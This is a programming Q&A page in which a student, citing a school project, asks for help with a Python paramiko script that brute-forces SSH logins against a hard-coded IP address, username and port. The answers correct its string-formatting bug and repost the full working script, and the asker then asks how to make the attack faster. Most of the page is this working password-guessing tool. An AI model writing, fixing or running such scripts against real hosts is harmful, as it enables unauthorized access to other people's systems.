Python SSH Brute Force

Question

Im writing a SSH Brute Force program for a school project, however i am stuck on the part where i have to make the password function. This is what my code looks like so far.

import itertools, paramiko, sys, os, socket


line = "\n-------------------------------------\n"

hostname= '138.68.108.222'
username = 'billy'
port = 50684
password = 'bingo'


input_file = open("example.txt", 'a')


chrs = 'abcdefghijklmnopkrstuvxy1234567890'
n = 3

for xs in itertools.product(chrs, repeat=n):
    password = '-its?' + ''.join(xs)
    input_file.write(password + "\n")


def ssh_connect(password, code = 0):

    ssh = paramiko.SSHClient()
    ssh.set_missing_host_key_policy(paramiko.AutoAddPolicy)

    try:

        ssh.connect(hostname = hostname, port = port, password= password, username= username)

    except paramiko.AuthenticationException:

        code = 1

    except socket.error as e:

        code =2

    ssh.close()
    return code

input_file = open("example.txt")

print("")


for i in input_file.readlines():

    password = i.strip("\n")
    try:
        response = ssh_connect(password)

        if response == 0:
            print("Password Found: "(line, username,password, line))
            sys.exit(0)

        elif response == 1:
            print("Password Incorrect: " (username, password))

        elif response == 2:
            print("Connection Failed: " (hostname))
            sys.exit(2)

    except Exception as e:
        print(e)
        pass

open("example.txt", 'w').close()

input_file.close()

The problem i have is that it understands that it should loop it, but all the output i get is:

>>> 'str' object is not callable
>>> 'str' object is not callable
>>> 'str' object is not callable
>>> 'str' object is not callable

Is there a way to fix this problem?

When i stop the program from running it gives me this Traceback:

Traceback (most recent call last):
  File "/Users/eliasdavidsen/PycharmProjects/Mandatory3/test.py", line 52, in <module>
    response = ssh_connect(password)
  File "/Users/eliasdavidsen/PycharmProjects/Mandatory3/test.py", line 30, in ssh_connect
    ssh.connect(hostname = hostname, port = port, password= password, username= username)
  File "/Library/Frameworks/Python.framework/Versions/3.6/lib/python3.6/site-packages/paramiko/client.py", line 394, in connect
    look_for_keys, gss_auth, gss_kex, gss_deleg_creds, gss_host)
  File "/Library/Frameworks/Python.framework/Versions/3.6/lib/python3.6/site-packages/paramiko/client.py", line 636, in _auth
    self._transport.auth_password(username, password)
  File "/Library/Frameworks/Python.framework/Versions/3.6/lib/python3.6/site-packages/paramiko/transport.py", line 1329, in auth_password
    return self.auth_handler.wait_for_response(my_event)
  File "/Library/Frameworks/Python.framework/Versions/3.6/lib/python3.6/site-packages/paramiko/auth_handler.py", line 198, in wait_for_response
    event.wait(0.1)
  File "/Library/Frameworks/Python.framework/Versions/3.6/lib/python3.6/threading.py", line 551, in wait
    signaled = self._cond.wait(timeout)
  File "/Library/Frameworks/Python.framework/Versions/3.6/lib/python3.6/threading.py", line 299, in wait
    gotit = waiter.acquire(True, timeout)
KeyboardInterrupt

Process finished with exit code 1

Possible duplicate of [TypeError: 'str' object is not callable (Python)](https://stackoverflow.com/questions/6039605/typeerror-str-object-is-not-callable-python) — Thecave3, Aug 31 '17 at 10:00
Add please all Traceback text. In what string you have an error? — Vladyslav, Aug 31 '17 at 10:02
Your print statements look fishy to me. `print("Password Found: "(line, username,password, line))` should be `print("Password Found: ", (line, username,password, line))` (missing comma, ditto for other statements) — jambrothers, Aug 31 '17 at 10:15
You're generating all possible passwords with a preifix "-its?", write them to a file, then read that whole file into memory and try ech password... That is very complicated, even for a school project. And how do you know each password should start with "-its?"? — mata, Aug 31 '17 at 10:33
Its part of our description for the assignment dont, dont ask me why haha. — mistochan, Aug 31 '17 at 10:35

score 0 · Answer 1 · answered Aug 31 '17 at 10:16

It's working. Try this:

import itertools, paramiko, sys, os, socket


line = "\n-------------------------------------\n"

hostname= '138.68.108.222'
username = 'billy'
port = 50684
password = 'bingo'


input_file = open("example.txt", 'a')


chrs = 'abcdefghijklmnopkrstuvxy1234567890'
n = 3

for xs in itertools.product(chrs, repeat=n):
    password = '-its?' + ''.join(xs)
    input_file.write(password + "\n")


def ssh_connect(password, code = 0):

    ssh = paramiko.SSHClient()
    ssh.set_missing_host_key_policy(paramiko.AutoAddPolicy)

    try:

        ssh.connect(hostname = hostname, port = port, password= password, username= username)

    except paramiko.AuthenticationException:

        code = 1

    except socket.error as e:

        code =2

    ssh.close()
    return code

input_file = open("example.txt")

print("")


for i in input_file.readlines():

    password = i.strip("\n")
    try:

        response = ssh_connect(password)

        if response == 0:
            print("Password Found: {}, {}, {}, {}".format(line, username,password, line))
            sys.exit(0)

        elif response == 1:
            print("Password Incorrect: {}, {}".format(username, password))

        elif response == 2:
            print("Connection Failed: {}".format(hostname))
            sys.exit(2)

    except Exception as e:
        print(e)
        pass

open("example.txt", 'w').close()

input_file.close()

In line 56, 60, 63 you ain't calling the variable properly. You forgot % though you can also use .format() as I have used in the code above

Thanks you very much! Both of the answers seems to be working! However the process so far seem pretty slow is there a way i could speed up the process?? — mistochan, Aug 31 '17 at 10:25

score 0 · Accepted Answer · answered Aug 31 '17 at 10:18

The traceback you posted (the one you get when interrupting the process) is actually irrelevant. The one that would have been usefull to let you debug the problem by yourself is lost due to your useless and actually harmful exception handler in your script's main loop, which you should either remove totally or at least rewrite to only catch expected exceptions - and then only wrap the ssh_connect() call, not the following code. IOW, you want to replace this:

for i in input_file.readlines():
    password = i.strip("\n")
    try:
        response = ssh_connect(password)
        if response == 0:
            print("Password Found: "(line, username,password, line))
            sys.exit(0)
        elif response == 1:
            print("Password Incorrect: " (username, password))
        elif response == 2:
            print("Connection Failed: " (hostname))
            sys.exit(2)
    except Exception as e:
        print(e)

With

for i in input_file.readlines():
    password = i.strip("\n")
    try:
        response = ssh_connect(password)
    except (your, list, of, expected, exceptions, here) as :
        do_something_to_correctly_handle_this_exception_here(e)

    if response == 0:
        print("Password Found: "(line, username,password, line))
        sys.exit(0)
    elif response == 1:
        print("Password Incorrect: " (username, password))
    elif response == 2:
        print("Connection Failed: " (hostname))
        sys.exit(2)

wrt/ your current problem, it's in the print calls above: you have:

 print("some message" (variable, eventually_another_variable))

which is interpreted as:

msg = "some message" (variable, eventually_another_variable)
print(msg)

where the first line is interpreted as a function call applied to the "some message" string, hence the exception. What you want is string formatting, ie:

print("Password Incorrect: {} {}".format(username, password))

There are also quite a few things that are a bit wrong with your code, like opening files without closing them properly, mixing functions and top-level code instead of putting all operational code in functions on only have one single main function call at the top-level, writing passwords to a file and re-reading that file when you don't need it (technically at least), etc...

Thanks you very much! Both of the answers seems to be working! However the process so far seem pretty slow is there a way i could speed up the process?? — mistochan, Aug 31 '17 at 10:25

Python SSH Brute Force

2 Answers2